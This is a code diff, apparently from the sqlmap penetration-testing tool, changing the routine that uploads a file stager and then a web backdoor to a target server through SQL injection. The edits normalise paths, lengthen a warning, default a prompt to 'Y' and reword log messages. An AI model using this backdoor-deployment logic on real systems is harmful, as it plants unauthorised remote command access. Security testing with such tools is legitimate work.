@@ -198,9 +198,11 @@ def webInit(self):
198198 for j in xrange (len (directories )):
199199 docRoot = kb .docRoot [i ]
200200 directory = directories [j ]
201+ uriPath = ""
201202
202203 if not all (isinstance (item , basestring ) for item in [docRoot , directory ]):
203204 continue
205+
204206 directory = ntToPosixSlashes (normalizePath (directory )).replace ("//" , "/" ).rstrip ('/' )
205207 docRoot = ntToPosixSlashes (normalizePath (docRoot )).replace ("//" , "/" ).rstrip ('/' )
206208
@@ -226,17 +228,14 @@ def webInit(self):
226228 else :
227229 continue
228230
229- uriPath = uriPath .replace ("//" , "/" ).rstrip ('/' )
230- localPath = localPath .rstrip ('/' )
231-
232- if not uriPath :
233- uriPath = '/'
231+ localPath = os .path .normpath (localPath ).rstrip ('/' )
232+ uriPath = os .path .normpath (uriPath ).rstrip ('/' )
234233
235234 # Upload the file stager
236235 self .__webFileInject (stagerContent , stagerName , localPath )
237236
238237 self .webBaseUrl = "%s://%s:%d%s" % (conf .scheme , conf .hostname , conf .port , uriPath )
239- self .webStagerUrl = "%s/%s" % (self .webBaseUrl . rstrip ( '/' ) , stagerName )
238+ self .webStagerUrl = "%s/%s" % (self .webBaseUrl , stagerName )
240239
241240 uplPage , _ = Request .getPage (url = self .webStagerUrl , direct = True , raise404 = False )
242241
@@ -259,7 +258,7 @@ def webInit(self):
259258 kb .data .__VIEWSTATE = extractRegexResult (r"__VIEWSTATE[^>]+value=\"(?P<result>[^\"]+)\"" , uplPage , re .I )
260259
261260 infoMsg = "the file stager has been successfully uploaded "
262- infoMsg += "on '%s' ('%s') " % (localPath , self .webStagerUrl )
261+ infoMsg += "on '%s' - %s " % (localPath , self .webStagerUrl )
263262 logger .info (infoMsg )
264263
265264 if self .webApi == "asp" :
@@ -280,33 +279,38 @@ def webInit(self):
280279
281280 if self .__webFileStreamUpload (backdoorStream , backdoorName , backdoorDirectory ):
282281 self .__webFileStreamUpload (runcmdStream , runcmdName , backdoorDirectory )
283- self .webBackdoorUrl = "%s/Scripts/%s" % (self .webBaseUrl . rstrip ( '/' ) , backdoorName )
282+ self .webBackdoorUrl = "%s/Scripts/%s" % (self .webBaseUrl , backdoorName )
284283 self .webDirectory = backdoorDirectory
285284 else :
286285 continue
287286
288287 else :
289288 if not self .__webFileStreamUpload (backdoorStream , backdoorName , posixToNtSlashes (localPath ) if Backend .isOs (OS .WINDOWS ) else localPath ):
290289 warnMsg = "backdoor has not been successfully uploaded "
291- warnMsg += "with file stager probably because of "
292- warnMsg += "lack of write permission."
290+ warnMsg += "through the file stager possibly because "
291+ warnMsg += "the user running the web server process "
292+ warnMsg += "has not write privileges over the folder "
293+ warnMsg += "where the user running the DBMS process "
294+ warnMsg += "was able to upload the file stager or "
295+ warnMsg += "because the DBMS and web server sit on "
296+ warnMsg += "different servers"
293297 logger .warn (warnMsg )
294298
295299 message = "do you want to try the same method used "
296- message += "for the file stager? [y/N ] "
297- getOutput = readInput (message , default = "N " )
300+ message += "for the file stager? [Y/n ] "
301+ getOutput = readInput (message , default = "Y " )
298302
299303 if getOutput in ("y" , "Y" ):
300304 self .__webFileInject (backdoorContent , backdoorName , localPath )
301305 else :
302306 continue
303307
304- self .webBackdoorUrl = "%s/%s" % (self .webBaseUrl . rstrip ( '/' ) , backdoorName )
308+ self .webBackdoorUrl = "%s/%s" % (self .webBaseUrl , backdoorName )
305309 self .webDirectory = localPath
306310
307311 infoMsg = "the backdoor has probably been successfully "
308- infoMsg += "uploaded on '%s', go with your browser " % self .webDirectory
309- infoMsg += "to '%s' and enjoy it!" % self .webBackdoorUrl
312+ infoMsg += "uploaded on '%s' - " % self .webDirectory
313+ infoMsg += self .webBackdoorUrl
310314 logger .info (infoMsg )
311315
312316 success = True
0 commit comments